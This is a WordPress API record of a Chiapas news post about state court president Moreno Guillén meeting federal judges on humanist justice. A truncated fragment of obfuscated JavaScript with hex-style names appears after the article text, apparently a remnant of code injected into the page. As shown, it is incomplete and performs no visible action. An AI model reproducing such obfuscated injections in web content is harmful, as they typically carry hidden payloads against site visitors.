{"id":19249,"date":"2024-12-12T04:12:09","date_gmt":"2024-12-12T04:12:09","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19249"},"modified":"2024-12-12T04:12:10","modified_gmt":"2024-12-12T04:12:10","slug":"se-reune-moreno-guillen-con-integrantes-del-poder-judicial-federal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19249","title":{"rendered":"Se re\u00fane Moreno Guill\u00e9n con integrantes del Poder Judicial Federal"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"849\" data-id=\"19250\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-11-at-2.24.54-PM-1024x849.jpeg\" alt=\"\" class=\"wp-image-19250\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-11-at-2.24.54-PM-1024x849.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-11-at-2.24.54-PM-300x249.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-11-at-2.24.54-PM-768x637.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-11-at-2.24.54-PM-1536x1273.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-11-at-2.24.54-PM-2048x1698.jpeg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"822\" data-id=\"19251\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-11-at-2.24.56-PM-1024x822.png\" alt=\"\" class=\"wp-image-19251\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-11-at-2.24.56-PM-1024x822.png 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-11-at-2.24.56-PM-300x241.png 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-11-at-2.24.56-PM-768x616.png 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-11-at-2.24.56-PM-1536x1233.png 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-11-at-2.24.56-PM-2048x1644.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>11 de diciembre del 2024. Tuxtla Guti\u00e9rrez; El magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Juan Carlos Moreno Guill\u00e9n, sostuvo un encuentro con integrantes del Poder Judicial Federal en Chiapas, y el jefe de la Oficina de la Gubernatura, Fernando Berm\u00fadez Velasco, en un espacio de cordialidad donde reafirmaron su compromiso con la impartici\u00f3n de justicia humanista.<\/p>\n\n\n\n<p>Durante este encuentro, Moreno Guill\u00e9n destac\u00f3 la importancia de la colaboraci\u00f3n entre las y los servidores del pueblo para lograr el acceso a la justicia que favorezca la cultura de paz en el estado.<\/p>\n\n\n\n<p>\u201cEn Chiapas, la impartici\u00f3n de justicia debe de ser en estricto apego a los derechos humanos, las y los chiapanecos, sin importar su situaci\u00f3n, merecen un trato humanitario y digno cuando acuden a los tribunales estatales y federales\u201d, enfatiz\u00f3 el presidente del Poder Judicial.<\/p>\n\n\n\n<p>En esta reuni\u00f3n estuvieron presentes integrantes del Poder Judicial Federal en el estado de Chiapas, la jueza Jazm\u00edn Robles Cort\u00e9s; los jueces, Alan Antonio Cavazos Maldonado e Ismael Arroniz Palacios; as\u00ed como los magistrados, Luis Arturo Palacios Zurita y Fidel Qui\u00f1ones Rodr\u00edguez.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 11 de diciembre del 2024. Tuxtla Guti\u00e9rrez; El magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Juan Carlos Moreno Guill\u00e9n, sostuvo un encuentro con integrantes del Poder Judicial Federal en Chiapas, y el jefe de la Oficina de la Gubernatura, Fernando Berm\u00fadez Velasco, en un espacio de cordialidad donde &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19250,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-19249","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19249","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19249"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19249\/revisions"}],"predecessor-version":[{"id":19252,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19249\/revisions\/19252"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19250"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19249"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19249"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19249"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}